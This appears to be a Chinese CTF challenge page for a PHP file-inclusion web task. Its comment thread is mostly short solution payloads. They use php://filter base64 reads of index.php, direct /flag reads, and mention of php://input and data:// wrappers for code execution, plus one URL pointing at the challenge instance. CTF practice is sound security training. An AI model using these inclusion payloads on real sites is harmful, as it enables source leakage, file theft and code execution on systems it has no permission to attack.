文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 13144
提  示:
描  述:
flag{}
评论
Ywctf 3月前

/?file=php://filter/read=convert.base64-encode/resource=index.php

回复 1

帅帅123 4月前

发现参数?file= 怀疑是文件读取或者目录穿越 尝试php为协议 命令执行:php://input data://text/plain,<?php ?> 字节流编码读取: php://filter/conver.base64-encode/resource=index.php

回复 0

奔跑的开开 4月前

?file=php://filter/read=convert.base64-encode/resource=index.php

回复 0

ok了 6月前

?file=php://filter/read=convert.base64-encode/resource=index.php 秒了

回复 0

VVang 6月前

用php://filter包含index.php,然后base64解码得到flag

回复 1

聪10011 7月前

猜flag位置,file=/flag

回复 2

8208240204 7月前

?file=php://filter/read=convert.base64-encode/resource=index.php 然后发现==表明是base64解码得到flag

回复 1

2686213396 8月前

http://117.72.52.127:17540/index.php?file=php://filter/convert.base64-encode/resource=index.php,php伪协议,读取 index.php文件

回复 0

zhuizhui 9月前

?file=php://filter/read=convert.base64-encode/resource=index.php

回复 0

17734916426 11月前

index.php?file=/flag

回复 2

WriteUp

image
harry

2 金币

评分(11)

解题动态

hxp1989442012 攻破了该题 5小时前
165 攻破了该题 6小时前
Yvvv1y 攻破了该题 7小时前
SZCX 攻破了该题 8小时前
yuesheng#1 攻破了该题 9小时前
影人sha 攻破了该题 10小时前
哈哈1 攻破了该题 10小时前
HexHackerCat 攻破了该题 15小时前
XGrey 攻破了该题 1天前
gg036 攻破了该题 1天前
jiaqi12138 攻破了该题 1天前
DSY0211 攻破了该题 1天前
网安苦手 攻破了该题 1天前
gu123qiang 攻破了该题 1天前
ylyys2026 攻破了该题 1天前
blaidd 攻破了该题 1天前
test1tian 攻破了该题 1天前
春羡晚 攻破了该题 1天前
hhhh1h 攻破了该题 1天前
夜神月1122 攻破了该题 1天前
问题反馈